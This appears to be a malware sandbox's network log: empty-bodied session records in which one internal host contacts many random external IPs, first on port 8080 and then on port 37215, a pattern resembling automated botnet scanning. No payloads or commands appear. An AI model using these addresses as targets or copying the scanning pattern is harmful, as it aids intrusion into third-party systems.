                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33786192.168.2.235126818.129.222.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33787192.168.2.2339850132.71.38.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33788192.168.2.2359804104.56.69.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33789192.168.2.2360930156.151.151.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33790192.168.2.233553291.148.214.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33791192.168.2.2350608151.168.93.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33792192.168.2.2348168116.104.83.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33793192.168.2.2354344209.208.13.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33794192.168.2.2335990149.159.221.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33795192.168.2.234297213.56.214.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33796192.168.2.2344198147.228.45.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33797192.168.2.2359670207.171.185.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33798192.168.2.2333026218.14.138.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33799192.168.2.2345528163.139.25.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33800192.168.2.234953873.109.193.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33801192.168.2.2339286147.221.227.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33802192.168.2.2340120137.39.157.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33803192.168.2.2336440177.55.151.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33804192.168.2.235853465.209.142.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33805192.168.2.234807894.195.124.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33806192.168.2.234639652.180.189.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33807192.168.2.2338744111.40.88.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33808192.168.2.234122841.143.177.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33809192.168.2.2360016190.142.233.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33810192.168.2.2339564206.12.179.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33811192.168.2.2334600136.63.239.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33812192.168.2.2342330217.30.18.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33813192.168.2.2353184118.14.3.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33814192.168.2.2336258181.22.191.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33815192.168.2.2349010174.71.139.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33816192.168.2.235734890.151.162.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33817192.168.2.233989691.109.111.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33818192.168.2.2340458109.240.70.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33819192.168.2.2350754153.140.48.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33820192.168.2.2347562187.231.167.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33821192.168.2.234722049.186.14.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33822192.168.2.2354086152.106.224.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33823192.168.2.233761269.182.78.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33824192.168.2.2350242179.38.190.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33825192.168.2.2358148114.67.54.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33826192.168.2.23592248.141.180.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33827192.168.2.2344694139.135.22.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33828192.168.2.2359788125.0.64.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33829192.168.2.2358800141.186.140.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33830192.168.2.2358578197.158.146.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33831192.168.2.235666252.45.174.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33832192.168.2.235959873.45.25.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33833192.168.2.2359098181.34.191.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33834192.168.2.235496038.140.198.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33835192.168.2.233869690.9.187.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33836192.168.2.2353878165.96.109.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33837192.168.2.234608224.114.243.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33838192.168.2.234714019.196.249.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33839192.168.2.235331092.147.144.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33840192.168.2.2336154211.40.57.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33841192.168.2.233471859.79.133.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33842192.168.2.2342972156.30.252.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33843192.168.2.2360780134.134.36.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33844192.168.2.233724083.81.192.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33845192.168.2.233303436.164.116.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33846192.168.2.234254089.250.38.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33847192.168.2.2346236220.236.86.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33848192.168.2.2341306222.172.12.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33849192.168.2.235448251.0.201.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33850192.168.2.2333852124.226.36.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33851192.168.2.2354316202.69.77.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33852192.168.2.2355762193.171.192.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33853192.168.2.233453072.225.64.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33854192.168.2.2338286201.244.245.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33855192.168.2.235914212.172.152.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33856192.168.2.2345302125.173.192.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33857192.168.2.2342820129.94.240.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33858192.168.2.2358564188.67.30.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33859192.168.2.2354072204.168.172.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33860192.168.2.2343838195.80.235.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33861192.168.2.2355922132.105.49.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33862192.168.2.2348768145.4.73.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33863192.168.2.2342320176.5.216.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33864192.168.2.2341462130.66.190.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33865192.168.2.234462649.13.48.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33866192.168.2.2353936113.229.101.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33867192.168.2.2346042186.158.18.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33868192.168.2.2354496126.246.89.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33869192.168.2.2352250222.110.127.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33870192.168.2.2354086154.48.134.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33871192.168.2.2350484222.109.1.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33872192.168.2.2350874189.141.39.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33873192.168.2.234056048.188.2.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33874192.168.2.2349984114.95.223.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33875192.168.2.2341866149.230.54.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33876192.168.2.2355608188.156.151.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33877192.168.2.2349930150.98.60.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33878192.168.2.233465825.102.191.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33879192.168.2.234732861.96.48.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33880192.168.2.233524875.118.223.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33881192.168.2.2355748114.170.199.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33882192.168.2.2352974169.228.60.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33883192.168.2.2357980135.56.19.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33884192.168.2.2354574154.255.160.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33885192.168.2.2345230146.9.114.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33886192.168.2.235227065.9.237.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33887192.168.2.2352558107.160.154.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33888192.168.2.233397081.143.68.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33889192.168.2.2343074197.44.209.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33890192.168.2.235369060.181.120.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33891192.168.2.2349986111.198.222.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33892192.168.2.2345408105.225.141.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33893192.168.2.2340400217.151.133.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33894192.168.2.235189077.64.17.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33895192.168.2.2345108115.166.126.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33896192.168.2.2339404178.225.84.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33897192.168.2.2357222158.96.26.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33898192.168.2.233563464.22.103.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33899192.168.2.235580449.202.168.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33900192.168.2.2338982162.16.155.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33901192.168.2.235737899.178.94.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33902192.168.2.234647082.232.157.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33903192.168.2.235590675.12.138.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33904192.168.2.2335172181.231.167.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33905192.168.2.2349046124.211.90.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33906192.168.2.233284877.172.226.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33907192.168.2.2355918159.252.35.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33908192.168.2.2348910144.33.180.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33909192.168.2.2358212211.236.185.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33910192.168.2.2339926176.7.51.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33911192.168.2.235940659.196.135.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33912192.168.2.233407241.44.52.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33913192.168.2.235749841.86.31.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33914192.168.2.233759041.103.60.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33915192.168.2.2343268147.44.91.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33916192.168.2.2360004157.227.127.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33917192.168.2.2354434143.132.112.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33918192.168.2.234943841.248.111.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33919192.168.2.2355532157.102.149.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33920192.168.2.2359000157.23.34.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33921192.168.2.2332920197.84.31.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33922192.168.2.2340848150.126.238.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33923192.168.2.2338060197.134.108.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33924192.168.2.233697099.43.240.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33925192.168.2.2341388136.59.37.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33926192.168.2.2336388144.31.91.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33927192.168.2.235191841.179.142.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33928192.168.2.2353772157.198.242.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33929192.168.2.233747683.7.177.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33930192.168.2.2355636197.141.155.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33931192.168.2.2348346157.104.21.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33932192.168.2.234423641.130.239.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33933192.168.2.2356988197.18.232.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33934192.168.2.2354330197.77.66.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33935192.168.2.234063641.241.120.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33936192.168.2.2350748157.18.30.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33937192.168.2.2335856157.211.204.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33938192.168.2.233327613.217.77.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33939192.168.2.2348232165.222.215.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33940192.168.2.2353258157.118.68.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33941192.168.2.233320241.78.65.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33942192.168.2.2334542132.96.111.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33943192.168.2.233417441.220.8.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33944192.168.2.235443238.12.238.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33945192.168.2.2351016218.62.14.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33946192.168.2.2356426137.193.138.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33947192.168.2.23361125.157.152.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33948192.168.2.235553441.247.10.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33949192.168.2.2345240157.170.135.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33950192.168.2.233936441.233.126.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33951192.168.2.2348468157.58.184.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33952192.168.2.2346834197.203.255.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33953192.168.2.234710641.232.200.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33954192.168.2.2334748197.14.237.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33955192.168.2.2338356147.84.97.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33956192.168.2.2349084176.129.114.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33957192.168.2.2355384157.241.55.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33958192.168.2.2351738197.201.140.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33959192.168.2.2344902191.209.250.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33960192.168.2.23495122.252.10.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33961192.168.2.2350648221.150.21.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33962192.168.2.2335792197.186.254.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33963192.168.2.2358122197.135.97.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33964192.168.2.235169885.207.76.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33965192.168.2.235109838.109.82.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33966192.168.2.2354050197.220.189.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33967192.168.2.2339308157.196.24.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33968192.168.2.234537097.211.158.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33969192.168.2.2360798157.191.28.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33970192.168.2.2346548157.196.29.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33971192.168.2.2356810157.115.41.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33972192.168.2.233809241.16.105.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33973192.168.2.234714841.50.218.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33974192.168.2.2360426152.135.140.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33975192.168.2.2354416197.176.57.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33976192.168.2.2355524157.107.255.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33977192.168.2.2334660202.54.8.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33978192.168.2.2347694197.102.201.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33979192.168.2.234871241.119.187.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33980192.168.2.2354050184.114.99.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33981192.168.2.235199641.34.96.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33982192.168.2.2349440197.105.33.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33983192.168.2.2351218122.142.27.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33984192.168.2.2346554197.241.171.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33985192.168.2.234694492.125.46.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33986192.168.2.2335522157.185.189.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33987192.168.2.2345406197.243.216.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33988192.168.2.235231441.188.174.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33989192.168.2.2353142157.49.61.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33990192.168.2.2347406197.97.132.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33991192.168.2.235082241.143.41.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33992192.168.2.2339782197.99.19.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33993192.168.2.234995674.94.193.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33994192.168.2.2353164157.96.98.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33995192.168.2.2338694154.12.113.14137215
                                                        TimestampBytes transferredDirectionData


